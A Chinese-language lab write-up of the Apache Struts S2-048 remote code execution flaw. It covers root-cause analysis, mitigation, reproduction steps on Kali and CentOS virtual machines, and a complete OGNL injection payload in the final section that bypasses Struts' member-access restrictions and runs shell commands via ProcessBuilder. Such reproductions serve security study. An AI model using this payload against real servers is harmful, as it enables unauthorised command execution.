一、漏洞分析
1.漏洞背景:
1)官方说明:
It is possible to perform a RCE attack with amalicious field value when using the Struts 2 Struts 1 plugin and it's a Struts1 action and the value is a part of a message presented to the user, i.e. whenusing untrusted input as a part of the error message in the ActionMessageclass.
2)详见:https://cwiki.apache.org/confluence/display/WW/S2-048,这个漏洞本质上是在struts2-struts1-plugin这个jar包上。这个库是将struts1的action封装成struts2的action以便在strut2上使用。
3)主要受影响的Struts版本为:2.3.x
4)攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。
2.漏洞原因
1)showcase/src/main/java/org/apache/struts2/showcase/integration/SaveGangsterAction.java下,“Struts1.gangsterAdded”被引入:
2)showcase/src/main/resources/globalMessages.properties下“Struts1.gangsterAdded”被定义:
Struts1.gangsterAdded是一个关键值,一旦“Gangster{0} added successfully”,它将绕开执行OGNL代码。
3)这个漏洞本质上是在struts2-struts1-plugin这个jar包上。这个库是将struts1的action封装成struts2的action以便在strut2上使用。本质问题出在struts2-struts1-plugin包Struts1Action.java文件中,Struts1Action类中的execute方法调用了getText函数,这个函数会执行ognl表达式,更为严重的是getText的输入内容是攻击者可控的。
4)输入参数之后,执行Struts1ction的execute方法。
5)调用saveGangsterAction的excute方法,将表单中地内容封装到actionforward,这个方法中就带入有毒参数gforn.getName()放到了messages结构中,gform.getName()的值是从客户端获取的。
6)攻击者将用户可控地值添加到ActionMessage并在客户前端展示,导致其进入getText函数,最后messageb被当作ognl表达式执行。以下两部分代码事位于integration app下的SaveGangsterAction.java部分源码:
3.漏洞总结:
1)通过运行struts1Acion.java的execute方法,获取Action。
2)调用saveGangsterAction的execute方法,这部分代码就是漏洞代码,这里创建了一个action message变量,将表单请求封装到actionForm中。代码详见图2.6)
3)设置标识,获取ActionMessage。
4)回到Struts1Action.java,跟着代码流,我们能看到控制流到达getText方法在TextProviderSupport.java:
红框所示的是在LocalizeTextUtil.Java中FindText的方法。这种方法负责找到本地message给key,它也能解析OGNL表达式。这个key就是aTextName,正如漏洞原因中提到的。
5)如果这种方法在提供地key中没有找到message,它就会调用getDefaultMessage地方法:
6)translateVariables方法从OgnlTextPrasrt.java中调用parser.evaluate方法,Parser.evaluate函数事负责从message段中解析OGNL表达式的,它检查在message中的”${“或者”%{”字符串,创建var变量并且求它的值。这里就不截图了。
7)在Apache Struts中,大部分OGNL注入漏洞都被爆出来了。攻击者能够利用这些漏洞很容易就执行命令,因为OGNL注入漏洞比起其他攻击更简单。
8)漏洞防护:1)停用Struts2-struts1-plugin插件、showcase.war;2)讲直接传递原始值改为使用资源键:
二、宿主环境及攻击环境
这里,我开了两个虚拟机,kali做攻击机,Centos做靶机,以模拟RCE。
1.靶机:centOS 7.3:
2.攻击机:kali linux
三、EXP实现
1.搭建漏洞环境
1)下载漏洞环境包:http://archive.apache.org/dist/struts/2.3.24/struts-2.3.24-apps.zip
2)下载Tomcat:http://tomcat.apache.org/tomcat-7.0-doc/index.html
3)在Centos解压Tomcat包(这里我解压到用户目录下)
4)将下载好的漏洞环境包解压,将struts2-showcase.war,将移至解压后的Tomcat目录下的webapps下
5)开启Tomcat,执行命令:
2.本地验证漏洞
1)在终端打开Tomcat之后,在浏览器查看:127.0.0.1:8080,下图表示tomcat搭建成功:
2)访问漏洞环境:(如果无法访问,重启Tomcat将自动部署漏洞war包)
http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action
3)验证漏洞环境
i.输入表达式
ii.Submit之后可看到运算被后台执行:
3.模拟RCE(远程代码执行)(确保Tomcat打开)
1)Centos开启httpd、iptables、关闭防火墙、设置虚拟机NAT地址和端口。详见:http://blog.csdn.net/microsoft2014/article/details/57413491
http://linux.it.net.cn/CentOS/fast/2015/0110/11567.html
2)确认Centos的IP:
3)Kali访问Centos,执行OGNL语句:
4)访问:http://192.168.152.136:8080/struts2-showcase/integration/saveGangster.action
5)Submit后:
4.POC使用
1)声明文件上传:
%{(#szgx='multipart/form-data')
2)注入OGNL代码,通过ognl表达式静态调用获取ognl.OgnlContext的DEFAULT_MEMBER_ACCESS属性,并将获取地结果覆盖_memberAccess属性,绕过SecurityMemberAccess限制:
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm))))
3)判断服务器系统,调用cmd或bash:
(#cmd='echo dota').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}
四、其他
1.复现过程中出现的问题及解决办法
1)Tomcat安装的时候,一开始安装我装的事7.0.8x版本,在浏览器上进不了tomcat,后来使用低版本的,成功解决这个问题。
2)关闭、重置Centos防火墙的时候在终端下输入命令可能会出现一些问题,这些问题一般是因为没有安装一些软件如:iptables、httpd等,解决方法已在上述说明。
3)模拟远端登录的时候,一定要注意攻击机输入地IP为Centos服务器地址+端口号。